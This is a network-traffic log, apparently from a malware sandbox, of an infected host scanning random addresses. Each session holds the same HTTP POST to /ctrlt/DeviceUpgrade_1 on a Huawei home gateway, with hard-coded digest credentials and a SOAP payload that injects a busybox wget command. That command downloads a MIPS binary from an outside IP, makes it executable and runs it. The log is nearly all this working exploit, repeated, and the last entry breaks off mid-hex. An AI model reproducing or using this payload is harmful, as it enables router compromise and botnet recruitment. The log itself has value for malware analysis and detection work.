                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    668192.168.2.2358850197.35.163.13037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307074070 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    669192.168.2.2341680156.208.181.9237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307106018 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    670192.168.2.2337048197.208.62.8037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307147980 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    671192.168.2.2337022197.84.49.23937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307178974 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    672192.168.2.235198241.199.2.5937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307218075 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    673192.168.2.2335724156.177.93.19437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307255030 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    674192.168.2.2349158156.169.205.3137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307291985 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    675192.168.2.2360150156.63.174.23037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307478905 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    676192.168.2.2354276156.52.23.23237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307512045 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    677192.168.2.2360622197.5.152.12637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307552099 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 